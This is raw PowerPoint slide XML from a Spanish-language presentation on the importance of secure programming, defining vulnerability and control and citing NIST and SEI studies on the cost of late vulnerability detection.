                    <a:pt x="0" y="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bg1"/>
                </a:solidFill>
                <a:latin typeface="Fira Sans SemiBold" panose="020B0603050000020004" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Grupo 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A1D4B0-2318-2E21-260B-92D43CB25FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7018393" y="2046578"/>
            <a:ext cx="1906022" cy="3807408"/>
            <a:chOff x="11118841" y="4572584"/>
            <a:chExt cx="3353599" cy="7977215"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="616C7E"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform: Shape 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802B38A3-68DB-A412-C8C7-F546DFAF654C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11118841" y="4572584"/>
              <a:ext cx="3353599" cy="7977213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2438400 w 2438403"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 4690630"/>
                <a:gd name="connsiteX1" fmla="*/ 2438403 w 2438403"/>
                <a:gd name="connsiteY1" fmla="*/ 1 h 4690630"/>
                <a:gd name="connsiteX2" fmla="*/ 2438403 w 2438403"/>
                <a:gd name="connsiteY2" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX3" fmla="*/ 2438403 w 2438403"/>
                <a:gd name="connsiteY3" fmla="*/ 4107441 h 4690630"/>
                <a:gd name="connsiteX4" fmla="*/ 2438400 w 2438403"/>
                <a:gd name="connsiteY4" fmla="*/ 4107440 h 4690630"/>
                <a:gd name="connsiteX5" fmla="*/ 3 w 2438403"/>
                <a:gd name="connsiteY5" fmla="*/ 4690630 h 4690630"/>
                <a:gd name="connsiteX6" fmla="*/ 3 w 2438403"/>
                <a:gd name="connsiteY6" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2438403"/>
                <a:gd name="connsiteY7" fmla="*/ 583190 h 4690630"/>
                <a:gd name="connsiteX8" fmla="*/ 3 w 2438403"/>
                <a:gd name="connsiteY8" fmla="*/ 583189 h 4690630"/>
                <a:gd name="connsiteX9" fmla="*/ 3 w 2438403"/>
                <a:gd name="connsiteY9" fmla="*/ 583189 h 46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403" h="4690630">
                  <a:moveTo>
                    <a:pt x="2438400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2438403" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438403" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438403" y="4107441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438400" y="4107440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="4690630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="583190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="583189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="583189"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="11EFBC"/>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r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Debilidad de los activos o de sus medidas de protección que facilitan el éxito de una amenaza potencial.</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform: Shape 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A26AD55-012B-0C7C-AF6E-E82BB64ACF71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11118845" y="11402291"/>
              <a:ext cx="3353595" cy="1147508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 674739"/>
                <a:gd name="connsiteX1" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY1" fmla="*/ 91550 h 674739"/>
                <a:gd name="connsiteX2" fmla="*/ 2381248 w 2381251"/>
                <a:gd name="connsiteY2" fmla="*/ 91549 h 674739"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY3" fmla="*/ 674739 h 674739"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY4" fmla="*/ 574572 h 674739"/>
                <a:gd name="connsiteX5" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 67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1" h="674739">
                  <a:moveTo>
                    <a:pt x="2381251" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="91550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381248" y="91549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="674739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Grupo 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38C545C-BA30-B713-4726-C98C8AE20B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8924415" y="1358672"/>
            <a:ext cx="1908000" cy="3807407"/>
            <a:chOff x="14573046" y="4572587"/>
            <a:chExt cx="3353595" cy="7977212"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="193330"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform: Shape 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F774D0D8-A264-011F-78D9-3B8D7A1C273C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14573046" y="4572587"/>
              <a:ext cx="3353595" cy="7977212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 4690629"/>
                <a:gd name="connsiteX1" fmla="*/ 2438398 w 2438400"/>
                <a:gd name="connsiteY1" fmla="*/ 583189 h 4690629"/>
                <a:gd name="connsiteX2" fmla="*/ 2438400 w 2438400"/>
                <a:gd name="connsiteY2" fmla="*/ 4690629 h 4690629"/>
                <a:gd name="connsiteX3" fmla="*/ 2438398 w 2438400"/>
                <a:gd name="connsiteY3" fmla="*/ 4690628 h 4690629"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY4" fmla="*/ 4107439 h 4690629"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY5" fmla="*/ 583189 h 4690629"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 2438400"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 469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 h="4690629">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2438398" y="583189"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2438399" y="1952336"/>
                    <a:pt x="2438399" y="3321482"/>
                    <a:pt x="2438400" y="4690629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2438399" y="4690629"/>
                    <a:pt x="2438399" y="4690628"/>
                    <a:pt x="2438398" y="4690628"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="4107439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="583189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="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r>
                <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CONTROL</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Medidas de protección desplegadas para que las amenazas no causen daño sobre los activos de la Organización.</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform: Shape 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6CDD4D-222D-8B3C-7559-00DABECE1D2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14573046" y="11402291"/>
              <a:ext cx="3353595" cy="1147508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 674739"/>
                <a:gd name="connsiteX1" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY1" fmla="*/ 574571 h 674739"/>
                <a:gd name="connsiteX2" fmla="*/ 2381251 w 2381251"/>
                <a:gd name="connsiteY2" fmla="*/ 674739 h 674739"/>
                <a:gd name="connsiteX3" fmla="*/ 2381249 w 2381251"/>
                <a:gd name="connsiteY3" fmla="*/ 674738 h 674739"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY4" fmla="*/ 91549 h 674739"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 2381251"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 67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1" h="674739">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="574571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381251" y="674739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2381250" y="674739"/>
                    <a:pt x="2381250" y="674738"/>
                    <a:pt x="2381249" y="674738"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="915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bg1"/>
                </a:solidFill>
                <a:latin typeface="Fira Sans SemiBold" panose="020B0603050000020004" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="CuadroTexto 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D543C482-9A39-2E78-089F-5995C1952E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913593" y="2750581"/>
            <a:ext cx="2343150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> VULNERABILIDAD</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Elipse 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67A9DBF-AED0-E4B5-2153-8D2A9BC3978D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1753019" y="1348143"/>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0" name="Elipse 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578ED45B-7FB7-80E8-E99D-CD9A53F0AC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820542" y="1780143"/>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1" name="Elipse 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDBC5966-5701-C4C9-5AD8-DDF0A697ED9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593643" y="955222"/>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2" name="Elipse 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BADF81F-4809-98F9-A7F9-0720639CA513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7576176" y="1767874"/>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3" name="Elipse 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C09C6A0B-792C-34C5-82F4-29EB022B766E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9446415" y="1078795"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Imagen 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6272372-2DB4-E20A-BEEB-804C4076C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76" y="1101509"/>
            <a:ext cx="571425" cy="571425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Imagen 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE33B51D-CF09-6F95-BD40-B055CCA618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1738" y="1906362"/>
            <a:ext cx="561303" cy="561303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Imagen 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FABB993-0253-0C85-2041-E902169C6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542" y="1527438"/>
            <a:ext cx="563896" cy="563896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Imagen 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1451C3-6A4E-77BB-5876-B6FB4731E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2899" y="1917111"/>
            <a:ext cx="550554" cy="550554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Imagen 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E667CB-CF94-02B4-F44A-D8CBFF49F3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10492" y="1236783"/>
            <a:ext cx="531091" cy="531091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E1671B-6833-C573-DE42-09A2B3898306}"/>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38484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D6AF6-D317-6983-8C19-CE8D378012B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2BE0A85-FD24-F941-DFCA-317FBDFE000A}"/>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03152ED-F7B6-179D-A7B7-1CF269579407}"/>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Importancia de la programación segura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDEB4AE-E3C8-E0B3-1CD5-01393350B1B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8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E524081E-1B47-4C9A-1C55-995AA3D9ADE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="754634" y="1289352"/>
            <a:ext cx="6861943" cy="3624266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61E2CAEA-22BA-58F9-A2B0-6556BF408DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754634" y="5092710"/>
            <a:ext cx="6861943" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx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 </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>The</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Economic</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Impacts</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of</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Inadequate</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Infrastructure</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectángulo 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66D4EEF-DA18-A937-9455-34A6BAA8CEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7712281" y="1831991"/>
            <a:ext cx="3370151" cy="2355973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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s-ES" sz="1800" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El coste de detección de una vulnerabilidad software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>crece exponencialmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>conforme avanza el tiempo necesario para detectarlo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C90AAFE-CC79-B019-A6EA-5BFC649424CF}"/>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553486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6C0BB-170B-690F-C79A-3F8B3D998CBA}"/>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5AD1C77-7AF2-41CE-B7BD-2A0BA80EC85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2C9BAB3B-69CF-2FDB-8DA1-69CD4294CC69}"/>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Importancia de la programación segura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A12BC9C-5C0A-DF35-2371-C9FDECCBBB3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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E0F2A3-1098-DB20-5FCE-F1DEFCEB51DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536871" y="5220558"/>
            <a:ext cx="7148946" cy="523220"/>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 </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software Engineering Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Making the Business Case for Software Assurance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectángulo 2">
            <a:extLst>
